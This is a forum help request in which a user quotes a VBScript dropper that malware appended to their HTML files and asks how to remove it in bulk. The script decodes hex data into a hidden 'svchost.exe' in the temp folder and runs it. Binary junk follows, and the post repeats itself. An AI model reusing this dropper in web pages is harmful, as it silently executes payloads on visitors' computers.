Hi there,
Stupidly, I was tired this morning, so I clicked "stop blocking" when windows firewall came up with something about firefox.
As a result, I now have a virus. I think I've removed it, but it'll reactivate if I open the html files it's infected..
What it's done is fairly obvious, at the end of the html files, it's left <SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000loadsmorecodehere"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=True Then
FSO.DeleteFile(DropPath)
End If
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
End If
//--></SCRIPT><!--83ϴ`;?t՝컮HѣȀی{{̵LM?vE^},ݓ?ȡ}䢱ϣԊe ͐?܍Ʋފ졤찬ּɘ'ڡ⼀;$lrۨߋ<)��ق7է=ѓ?/ɔ2כAfXƗƐԶ֕³ﭏ?ɱѿ߾H{��݀��ࠂxͥ;]��=Τ8Ʊ3ʝgwʩߕ.nŧNX'ЈKٽٛ´Y Zbލ"7灃5+Ϲޓ?閶æծ$'Ҹ@hT{ٜ߭hf˙��휜QDݬ:ۂawŏ؉žYژ).Λ]>ެƪ~��)ČڦFcÉ?ȯꙬ]u̱7pfԗФдGˏ?w
So, I have the list of the html files infected. Is it possible to make a vb file or something that'd delete everything from "<SCRIPT Language" onwards in ~80 html files? I had a look online, but couldn't find any solutions.
I know it's a bit different from the usual posts here, but hopefully this should be fairly simple?
Tits:
Stupidly, I was tired this morning, so I clicked "stop blocking" when windows firewall came up with something about firefox.
As a result, I now have a virus. I think I've removed it, but it'll reactivate if I open the html files it's infected..
What it's done is fairly obvious, at the end of the html files, it's left <SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000loadsmorecodehere"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=True Then
FSO.DeleteFile(DropPath)
End If
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
End If
//--></SCRIPT><!--83ϴ`;?t՝컮HѣȀی{{̵LM?vE^},ݓ?ȡ}䢱ϣԊe ͐?܍Ʋފ졤찬ּɘ'ڡ⼀;$lrۨߋ<)��ق7է=ѓ?/ɔ2כAfXƗƐԶ֕³ﭏ?ɱѿ߾H{��݀��ࠂxͥ;]��=Τ8Ʊ3ʝgwʩߕ.nŧNX'ЈKٽٛ´Y Zbލ"7灃5+Ϲޓ?閶æծ$'Ҹ@hT{ٜ߭hf˙��휜QDݬ:ۂawŏ؉žYژ).Λ]>ެƪ~��)ČڦFcÉ?ȯꙬ]u̱7pfԗФдGˏ?w
So, I have the list of the html files infected. Is it possible to make a vb file or something that'd delete everything from "<SCRIPT Language" onwards in ~80 html files? I had a look online, but couldn't find any solutions.

I know it's a bit different from the usual posts here, but hopefully this should be fairly simple?
Tits:
